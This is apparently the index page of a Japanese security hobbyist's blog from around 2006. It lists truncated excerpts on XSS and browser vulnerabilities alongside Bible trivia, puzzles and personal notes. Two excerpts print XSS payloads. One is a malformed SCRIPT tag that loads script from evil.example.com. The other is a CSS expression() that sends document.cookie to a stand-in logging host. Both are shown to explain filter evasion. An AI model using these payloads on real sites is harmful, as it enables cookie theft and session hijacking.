ところが。イエスの復活について記してある聖書の大事な部分、マルコ福音書、マタイ福音書、ルカ福音書を精読すると、イエスの復活は２日後なんですよ。ええええええとか思うクリスチャンがいたとしたらもう一回福音書を読んでいただきたいです。要するに勘…

Googleで検索語として「三日後」「復活」とし、検索すると日本語サイトでもけっこうな数のキリスト教関連のマジメなサイトがひっかかります。まぁアレですね。旧約新約の聖書に関連して三日後というのは重要なキーワードなんでして。 たとえばイエスがこうい…

ゴルゴ13という架空のスナイパーがいます。不吉な奴だぜ？というネーミングです。「13日の金曜日恐怖症(paraskavedekatriaphobia)」に悩む人が全米だけでおよそ1700万〜2100万人はいると推測されています。イエス・キリストが13日の金曜日にゴルゴダの丘で磔…

遊びでCGIを作りました。XSS脆弱性があります。模擬アタックをかけてみてください。上の図のように、勝手な英文を２行ほど、背景は黒で字は白く、表示して下さい。元々表示されるべきコンテンツが出ていてはいけません。URL欄は当該CGIのURLにしてください。…

<SCRIPT/!#$%&()*~+-_.,:;?@[/|\]^`=''SRC!#$%&()*~+-_.,:;?@[/|\]^`='http://evil.example.com/xss.js'></SCRIPT>こんな畸形例がFirefoxで通るらしい。"<SCRIPT\s" != "<SCRIPT/XSS\s" とかどころじゃないので正しくフィルタリングしようねというお話し、ということでいいのかな？ Rsnake氏、FirefoxのHTML parser を読んで発見したらしい。<SCRIPT/=''SRC='http://evil.example.com/xss.js'></script\s">

■XSS脆弱性悲喜こもごも XSS脆弱性関連で本日嬉しかったこと１ はてなのサービスのXSS脆弱性をはてなさんに報告したら5分以内に返事が返ってきたこと。これは嬉しいですね。私がはてなを継続的に使うのはこういうマジメさが好きだからです。 とはいえ、恐ら…

■XSS脆弱性修正に失敗してしまった駄目な例 はじめに 本件は本日IPAに報告したものです。未修正の脆弱性を抱えているサイトについてつまびらかにすることは宜しくありませんし、そのことは重々承知しております。しかしながら色々な意味で非常に教訓的ですの…

<html> <body> <style type="text/css"> h1 { background#:/*;*/ expression('url(http://commonevillogger.example.com/log.php'+document.cookie+')'); } </style> <h1>heading</h1> </body> </html>上記はCookieを悪意あるサイトに飛ばす例です。IEのみ対応。 （ちなみに、expressionを使っていてもcommonevillogger.example.…

■IE object要素のクロスドメイン情報漏えいの脆弱性(CVE-2006-3280)への対処策について 本記事の概要 以下の記事中における、IEのふたつの脆弱性のうち、object要素におけるクロスドメインのセキュリティ・ホール(CVE-2006-3280)に対しての、一定程度有効な…

■Firefoxとスクリプトによる自動的なクリップボードアクセス クリップボードデータを盗まれる 概要 MicrosoftのWebブラウザ「Internet Explorer」（以下「IE」と略す）には、「スクリプトによる貼り付け」という名の機能があります。これは、「JScript」（Ja…

■ object.documentElement.outerHTMLプロパティ処理の脆弱性（IE）(Firefox) なんですと？またもやデータ盗みネタですか 今度はIEにくわえFirefoxもでしょうか… object.documentElement.outerHTMLプロパティ処理の脆弱性 これを悪用すると、現在ユーザーが参…

■所謂CSSXSS脆弱性の現況および注意点 いわゆるCSSXSS脆弱性にはSecurityUpdateが出ている CVE-2005-4089の、いわゆるCSSXSS脆弱性は、既にMS06-021によってFIXされています。ユーザが通常の使い方をしているのであるならば、ほぼ安全であると考えられます。…

■IEにおいてUS-ASCIIなエンコーディングでXSS発生？ US-ASCII な記述で、<,>,", のフィルタリングを回避可能かもの実証コード(IEのみが脆弱) ちょっと古いハナシなのでしょうけれど。 ASCII Test: www.iku-ag.de 原因はどこにあるのか 上記実例にてサーバか…

■OTD BBS の spam 対策 OTD BBSへのspam対策が難しい 必要に迫られて、急遽、調べてみました。レンタルのOTD BBSへのspamは、ほとんどが「既にspyware等にやられちまっている」多数の善意のユーザのパソコンに巣食っているbotによって無差別に投稿されていま…

最近見た夢の中でヒゲがはえて杖をもっているブラフマン爺さんが私に語った言葉が面白かったです。 ブラフマン師匠 ･･･というわけで、４つの座標軸とは別に、その他のいくつもの座標軸があって、その他の座標軸が見えないほど小さく畳み込まれているという考…

久しぶりにパソコンいじってOperaのiniファイルを見てみたら確かに。これは困るかもです。コメントを頂いた匿名の臆病者さん、有難うございました。私だけではないようです。 http://d.hatena.ne.jp/hoshikuzu/20060530#p1 http://d.hatena.ne.jp/hoshikuzu/…

えむけい Firefoxですごいの発見しました。詳細はまだ書けませんが、「危険な」タグのみを殺しているようなWebアプリケーションでXSSが超簡単に成立します(ホワイトリスト方式なら問題ないはずですが)。2000年頃からのGeckoエンジンブラウザすべてが同様に影…

MS06-021の適用によって、CVE-2006-2384の脆弱性が解決されます。CVE-2006-2384の脆弱性について、JVN#74969119にて解説を読むことが出来ます。不肖私めが、報告者となっているわけですが…残念かつ面白いことに、IPAさんへの報告時において私が提示した実証…

本日よりいよいよ休憩モードにはいります。アンテナを見ていても更新は少ないハズです。IPアンリーチアブルです。メールのお返事がデキマセンです。もうしわけありません。

森の石松 旅ぃ行けぇばぁぁぁぁ 駿河の国にぃ 茶の香りぃぃぃぃ 名代なるかな東海道ぉぉぉ、名所古跡の多いなかぁぁぁぁぁぁぁ。 松と並んでその名を残す、遠州！森の石松のぉぉぉぉ、苦千万のお粗末をぉぉぉぉぉぉぉ、時間来るまでぇぇぇ、勤めぇぇぇぇまし…

２人の女性が、カフェテラスでコヒーを飲みながらお喋りをしている。 「お久しぶり！ 大学を卒業して以来じゃない？」 「あれから、もう１０年以上も経つのね、早いものね…」 「お子さんは何人？ 私は男の子が１人よ」 「私は娘が３人よ」 「３人の娘さんは…

フィッシング詐欺にひっかからない自信がだんだんなくなってきましたよ？ Note that this list is automatically updated and if you edited it it'll be overwritten after some hours/days. せっかくホワイトリストを修正しても、数時間ないし数日後には自…

ちょっと休憩モードにはいります。アンテナを見ていても更新は少ないハズです。IPアンリーチアブルです。メールのお返事がデキマセンです。もうしわけありません。

一部に熱狂的なファンが存在するＴＶドラマ「トゥルー・コーリング」はシーズン２の途中で残念ながら打ち切りになってしまいました。惜しまれる中、海外のファンジンが、非公式続編としてバーチャルシーズン３をWeb上で発表しています。また、その邦訳も出て…

コインが7枚あります。内5枚は正規のコインです。内2枚はニセコインです。5枚の正規コインは互いに重量は等しいです。2枚のニセコインは互いに重量が等しいです。正規コインの重量とニセコインの重量は異なります。ニセコインのほうが軽いです。 天秤を3回使…

http://stardust.s2.xrea.com/hatena/200605/miaumiau2.flv

http://d.hatena.ne.jp/hoshikuzu/20060523#P20060523OPERASPOOFING に追記しました。Operaにおける.comなURLでのIDNオフの仕方のヒントになります。hioさんから情報提供していただきました。まことにありがとうございます。既に私は対策させて頂きました。

■Operaにおけるアドレスバーあるいはステータスバー偽装可能のポテンシャリティー Operaにおいてアドレスバーないしステータスバーないしリンクアンカーへのオンマウスオーバー時のポップアップにおけるリンク先アドレスなどが偽装可能かも(JavaScript不要) …

■亜子たん HELP ME 亜子たん 余裕があったらでいいけど HELP ME mixi運営事務局です。 mixi は、友人・知人同士の交流を目的としたサイトです。 また完全招待制のサイトであることからも、マイミクシィ0のユーザー様に関しては、大変申し訳ございませんが、…

■Quantum computer solves problem, without running Quantum computer solves problem, without running どういう意味？＜Quantum computer solves problem, without running 量子コンピューターが実行されることなく問題を解く こういう狂気じみたオハナシ…